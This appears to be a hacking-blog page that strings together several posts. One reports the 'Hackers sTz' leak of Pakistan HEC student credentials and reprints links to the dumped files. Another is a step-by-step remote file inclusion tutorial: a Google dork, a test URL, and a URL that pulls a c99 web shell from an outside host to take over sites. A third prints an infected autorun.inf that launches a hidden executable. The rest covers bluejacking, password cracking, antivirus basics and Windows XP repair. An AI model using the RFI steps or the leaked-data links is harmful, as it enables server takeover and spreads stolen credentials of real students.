OpIslam: Israeli Hackers Hack HEC(Higher Education Commission) of Pakistan Website

Website of Higher Education Commission of Pakistan was hacked by the Israeli Hackers and Thousands of email addresses, user names and clear text passwords for students with 21667 was published online.

The leaked data from the Pakistan Higher Education Commission has been posted to pastebin with a index of links which link to two further files, 1 clear text and 1 rich text file on two different file hosts.

1 year ago Pakistani Hackers attack Israeli Cyber space and that attack was lead by 1337, who Hack Israeli top domains and other attack lead by Hitcher. This show's that these kind of attack on Pakistani Cyber space may resultant very messy for Israeli cyber space.

"We anti islam

We Love israel <3

We Do Not Forgive

We DO Not Forget

Expext Us

Stop islam

israel is Terrorist

We site http://stz-hacker.noads.biz/

https://www.facebook.com/TheHackersStzNews

Leaked by Hackers sTz

48000 users hec.gov.pk Hacked

text http://www.mediafire.com/?cbb0bip1po8hhi8

text http://www.f2h.co.il/y01jphoxfix1

text rtf http://www.mediafire.com/?zbv4iz1b5g455a1

text rtf http://www.f2h.co.il/8ako95gm9arc"

This attacks on major sites of countries rise many question for Pakistani security experts and Pakistani hackers. 

Hack a website using remote file inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

So the hacker url will become

http://www.targetsite.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rahul/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.targetsite.com/v2/index.php?page=http://h1.ripway.com/rahul/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it...

Bluejacking Bluetooth+Hijacking

BlueJacking is one of the mostly harmless activity can happen with any multimedia cell phone. Though it is an unintended and illegal use of a technical feature, mostly hard-core geeks do not find sufficient technical challenge in the activity. For the more serious hacker and crackers looking to explore the security features of their Handset. BlueTooth hacking tools (BlueJacking Tools) should be used in a legal and in ethical way. Remember one thing real people own these devices, and rely on them for everyday tasks, so please remember to “Do Not Harm”.

Now, What Is Exactly Bluejacking ??

BlueTooth Hijacking or BlueJacking is a technique which used to sending unsolicited messages over Bluetooth to Bluetooth enabled devices such as mobile phones, PDAs or laptops, computers, sending a vCard which typically contains a message in the name field to another Bluetooth enabled device via the OBEX protocol.

As I already said, Bluejacking is usually harmless, however because BlueJacked people generally don’t know what has happened, they may think that their phone is malfunctioning. A BlueJacker will only send a text message, but in these days with modern phones it is possible to send sounds, clips and images as well. Bluejacking has been used in marketing campaigns to promote advergames and products.

In nowadays, With the increase in the availability of Bluetooth enabled devices (Phone, PDA etc etc), it is often reported that these devices have become vulnerable to virus, Trojan, malware attacks and even complete take over of devices through a trojan horse program although most of these reports are easily debunked. Bluejacking is also confused with Bluesnarfing which is the way in which mobile phones are illegally hacked via Bluetooth.

Tools For Bluejacking

There are many tools that have been developed for BlueJacking, most of the development happened in the 2008 to 2012, where multiple new bluetooth vulnerabilities were discovered. There are not any specific or official tool but are there many tools to assist someone in bluejacking, only a few hidden tools are available for the more sinister  “BlueSnarfing” or “BlueBugging”. Most commonly used bluetooth software are “Bloover” and “Easyjack”

BlueJacking is very useful for hackers on that device which do not require authentication and in these days almost (99%) handsets are required authentication before making any connection to another Bluetooth enable handset.

Countermeasures

Well after all if you how we can attack with BlueJack, we should also know how we can prevent from BlueJack and what are the countermeasures against BlueJacking. So I am going to give some Countermeasures:-

1. To Prevent BlueJacking, make sure that your device’s bluetooth is turn off in certain public areas like shopping centers, movie theaters, coffee houses, bars, university and electronic stores.

2. Set your Bluetooth device to invisible or hidden mode from the main menu. This will prevents the sender from seeing your device.

3. Turning your Bluetooth invisible remains a good option when you normally don’t connect with other devices. Enable visibility only when you need to pair your device with another.

4. Ignore BlueJacking messages by refusing or deleting them. Consider BlueJacking the same way you think about spam.

5. Attackers or Hacker begin BlueJacking by placing a message in the name field of their phone like, “Special Offer” or “wow!! you won this prize, enter 123 to unlock” Next, they look for enabled devices in the area and select the one they want to BlueJack. They usually send these messages via Bluetooth.

How to become anonymous on Internet and access any block site

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. We love the web because of the freedom that it creates to explore, organize, and communicate. 
Hotspot Shield enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Hotspot Shield. Standard antivirus software protects your computer, but not your web activities.
That's why Anchor Free is pleased to offer Hotspot Shield. Our application keeps your Internet connection secure, private, and anonymous.

100% Security Through a VPN

Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application is free to download, employs the latest VPN technology, and is easy to install and use.

Hotspot Shield runs on:

• Windows 7
• Windows XP
• Windows 2000
• Windows Vista
• Mac OS X (10.5 Leopard)
• Mac OS X (10.6 Snow Leopard)
• Mac OS X (10.7 Lion)

You will be able to download this software on given link DOWNLOAD NOW

NOTE: - This tutorial is only for learning purpose and i am not responsible for any type of harm.

Control Mouse Movement by your Hand or Head Gestures with NPointer

if you need to work much on the computer (like me) and tend to take small breaks to sit back and lean on the chair, then you must have felt the need of some wireless mouse controller then this post is worth reading. In case you just wish to have some gesture controlled mouse controller, then also this post is going to interest you.

There are lot of tools in the market using which you can control your mouse without any direct contact. Some of them use the webcam to recognize your movements and convert the signals into mouse movements. One good tool that does the same and does well is called the NPointer.

NPointer is an application for gestural computer control in which hand movements are recorded by the webcam connected to your PC and then translated into the mouse movements. The application can also decode the usual mouse operations like clicks, double-clicks, drags and scrolls. Also, disabled people can also use the head movements to control the computer.

To get started you just need to install the tool in your system and then configure it to recognize your hand/head movements. If you plan to use your hand for the mouse control, then place them on the table and keep the webcam straight up. You may wave the hands in air too but table method is better for error free recognition.

 You then need to configure some settings like Motion Speed (how fast the pointer will move compared to the hand movement), Acceleration (how fast the pointer accelerates when hand motion speed changes), Menu timeout (how long the pointer should stay idle before action menu appears) and Movement cut-off (how fast the hand should move to ignore the movement. This is used when you wish to remove the hands without disturbing the pointer position). If you check the Head/Frontal Control box, then you can use you head in place of hands to control the mouse movements.

You will now see some controls on the screen which can be used to perform the same operations as performed otherwise. The tool is free to use and works well on all versions of Windows. You can read more about it at the link below.

Download NPointer

How Antivirus Software Works

Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer.

Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one among those few who would really bother to understand how an antivirus works, then this article is for you.

How Antivirus Works:

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based dectection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants so that, the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.

Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

Most commercial antivirus software use a combination of both signature-based and heuristic-based approaches to combat malware.

Issues of Concern:

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However, most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.

Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".


4) Open Command Prompt.


5) Drag this file (.bat file) over to Command Prompt and press 
Enter.


6) Now, type the IP Address of the computer you want to contact and press enter


7) Now all you need to do is type your message and press Enter.Start Chatting.......!

Share for anyone..........................

Basic of Password Cracking for Beginner

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.


Most passwords can be cracked by using following techniques :
1) Hashing :- 

Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- 

Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- 

A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- 

If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.

5) Phishing :- 

This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.


Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Repairing Windows XP in Eight Commands

Windows could not start because the following file is missing or corrupt:

\\WINDOWS\\SYSTEM32\\CONFIG\\SYSTEM

You can attempt to repair this file by starting Windows Setup
using the original Setup CD-ROM.

Select ‘R’ at the first screen to start repair.

Which renders your PC inaccessible from the standard boot procedures of Windows XP. You try safe mode, to no avail. You’re particularly savvy and try issuing the FIXBOOT and FIXMBR commands in the Windows recovery console, but after each reboot, you’re merely greeted with the same obnoxious and terrifying blue screen of death that’s preventing you from accessing your precious data.

Perhaps you’ve also seen these error screens:

Windows NT could not start because the below file is missing or corrupt:

X:\\WINNT\\System32\\Ntoskrnl.exe
_________________

Windows NT could not start because the below file is missing or corrupt:

X:\\WINNT\\System32\\HAL.dll
_________________

NTLDR is Missing
Press any key to restart
_________________

Invalid boot.ini
Press any key to restart


Allow me to build tension by prefacing the end-all/be-all solution with my background: Having worked for the now-incorporated Geek Squad branch of Best Buy Corporation for the better part of eight months, I have seen dozens upon dozens of systems come through our department with any one of these errors, brought in by customers who are afraid they did something, have a virus, or are in jeopardy of losing their data. Prior to my discovery of an invaluable sequence of commands, our standard procedure was to hook the afflicted drive to an external enclosure, back up a customer’s data and then restore the PC with the customer’s restore discs or an identical copy of Windows with the customer’s OEM license key. If the customer wasn’t keen on the applicable charges for the data backup, we informed them of the potential risks for a Windows repair installation (Let’s face it, they don’t always work right), had them sign a waiver, and we did our best.

Neither of these procedures are cheap in the realm of commercial PC repair, nor do they inspire a tremendous level of confidence in the technician or the hopeful client.

In an effort to expedite our repair time and retain the sanity of myself and other technicians, I received permission to undertake a case study on a variety of PCs currently in service that exhibited any of the aforementioned symptoms, and I took it upon myself to find a better solution. After crawling through the MSKB, Experts Exchange, MSDN and sundry websites all extolling the virtues of a solution to these problems, I only found one that worked, and it has been reliably serving me for the better part of two weeks on seventeen PCs to date. The process is simple: Get to the Windows Recovery Console for your particular Windows installation, navigate to the root letter of your installation (C: in most cases), issue eight commands, and reboot. The cornerstone of this process is a command called “BOOTCFG /Rebuild” which is a complete diagnostic of the operating system loaded into the recovery console; the purpose of the command is to remove/replace/repair any system files that were preventing the operating system from loading correctly. Amongst the files it fixes are:

Windows Hardware Abstraction Layer (HAL)
Corrupt registry hives (\\WINDOWS\\SYSTEM32\\CONFIG\\xxxxxx)
Invalid BOOT.INI files
A corrupt NTOSKRNL.EXE
A missing NT Loader (NTLDR)
The command process may apply to other types of blue screens or Hive/HAL/INI/EXE/DLL-related stop errors, but I have not had the luxury of computers in this type of disrepair. The process I am about to outline is virtually harmless, and if you feel you may be able to correct your PC’s boot-time blue screens and stop errors with the sequence, feel free to try. Let us now begin with a step-by-step instruction for correcting these issues.

GETTING TO THE WINDOWS RECOVERY CONSOLE
Insert your Windows XP CD into your CD and assure that your CD-ROM drive is capable of booting the CD. Configuring your computer to boot from CD is outside of the scope of this document, but if you are having trouble, consult Google for assistance.
Once you have booted from CD, do not select the option that states: “Press F2 to initiate the Automated System Recovery (ASR) tool.” You’re going to proceed until you see the following screen, at which point you will press the “R” key to enter the recovery console:

After you have selected the appropriate option from step two, you will be prompted to select a valid Windows installation (Typically number “1″). Select the installation number, (As mentioned, “1″ in most cases), and hit enter. If there is an administrator password for the administrator account, enter it and hit enter. You will be greeted with this screen, which indicates a recovery console at the ready:

PROCEEDING WITH THE REPAIR FUNCTIONS
There are eight commands you must enter in sequence to repair any of the issues I noted in the opening of this guide. I will introduce them here, and then show the results graphically in the next six steps. These commands are as follows:
C: CD ..
C: ATTRIB -H C:\\boot.ini
C:ATTRIB -S C:\\boot.ini
C:ATRIB -R C:\\boot.ini
C: del boot.ini
C: BOOTCFG /Rebuild
C: CHKDSK /R /F
C: FIXBOOT
To “Go up a directory” in computing is to revert back to the directory above the current folder you’re operating in. If, for example, I’m in the C:WINDOWSSYSTEM32 directory, and I want to get at a file in the WINDOWS directory, I would merely type CD .. and I would be taken out of the SYSTEM32 folder and up one level to WINDOWS. We’re going to do the same thing here from the WINDOWS folder to get to the basic root of C:

Now that we are at C: we can begin the process of repairing the operating system
and that begins with modifying the attributes of the BOOT.INI file. Briefly, BOOT.INI controls what operating systems the Windows boot process can see, how to load them, and where they’re located on your disk. We’re going to make sure the file is no longer hidden from our prying eyes, remove the flag that sets it as an undeletable system file, and remove the flag that sets it as a file we can only read, but not write to. To do this, we will issue three commands in this step:

C:ATTRIB -H C:\\BOOT.INI
C:ATTRIB -R C:\\BOOT.INI
C:ATTRIB -S C:\\BOOT.INI
to remove the Hidden, System and Read Only flags.

Now that we’ve modified the attributes for the BOOT.INI file, it’s up for deletion. The syntax for it is simple: { DEL | FILE NAME }, e.g., C:DEL BOOT.INI deletes the BOOT.INI file.

Now for the most important step of our process, the BOOTCFG /REBUILD command which searches for pre-existing installations of Windows XP and rebuilds sundry essential components of the Windows operating system, recompiles the BOOT.INI file and corrects a litany of common Windows errors. It is very important that you do one or both of the following two things: First, every Windows XP owner must use /FASTDETECT as an OS Load Option when the rebuild process is finalizing. Secondly, if you are the owner of a CPU featuring Intel’s XD or AMD’s NX buffer overflow protection, you must also use /NOEXECUTE=OPTIN as an OS Load Option. I will demonstrate both commands for the purpose of this guide, but do not set NOEXECUTE as a load option if you do not own one of these CPUs. For the “Enter Load Identifier” portion of this command, you should enter the name of the operating system you have installed. If, for example, you are using Windows XP Home, you could type “Microsoft Windows XP Home Edition” for the identifier. This gives the process some authenticity, if you’re keen on being a perfectionist.

This step verifies the integrity of the hard drive containing the Windows XP installation. While this step is not an essential function in our process, it’s still good to be sure that the drive is physically capable of running windows, in that it contains no bad sectors or other corruptions that might be the culprit. No screenshot necessary here! Just type CHKDSK /R /F at the C:> prompt. Let it proceed; it could take in excess of 30 minutes on slower computers, when this is finished move on to the seventh and final step.

This last step also requires no screenshot. When you are at the C:> prompt,
simply type FIXBOOT. This writes a new boot sector to the hard drive and cleans up all the loose ends we created by rebuilding the BOOT.INI file and the system files. When the Windows Recovery Console asks you if you are “Sure you want to write a new bootsector to the partition C: ?” just hit “Y,” then enter to confirm your decision.

RESULTS AND WRAP-UP
It’s time to reboot your PC by typing EXIT in the Windows Recovery Console and confirming the command with a stroke of the enter key. With any luck, your PC will boot successfully into Windows XP as if your various DLL, Hive, EXE and NTLDR errors never existed. You’ve just saved yourself from many hours of work, frustration, potential data loss and shelling out your hard-earned greenbacks at a brick’n'mortar operation.

Autorun.inf attak!! ? read this and know what happen to inf file

Autorun.inf virus attack! Is autorun.inf virus?

This is the instructions that saved in the infected(call virus programs) autorun.inf file:

[Autorun] 
Open=RECYCLER\QqFvXcB.exe 
Explore=RECYCLER\QqFvXcB.exe 
AutoPlay=RECYCLER\QqFvXcB.exe 
shell\Open\Command=RECYCLER\QqFvXcB.exe 
shell\Open\Default=1 
shell\Explore\command=RECYCLER\QqFvXcB.exe 
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad

type this command:

[Autorun]

save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=

This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.

if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=

Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=

Same as the above , but it will launch the the program when auto played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

    shell\Open\Command=RECYCLER\QqFvXcB.exe
    shell\Open\Default=1
    shell\Explore\command=RECYCLER\QqFvXcB.exe
    shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=

Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=hackingtalent.ico

Label=

Specifies a text label to displayed for this CD in Explorer

Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.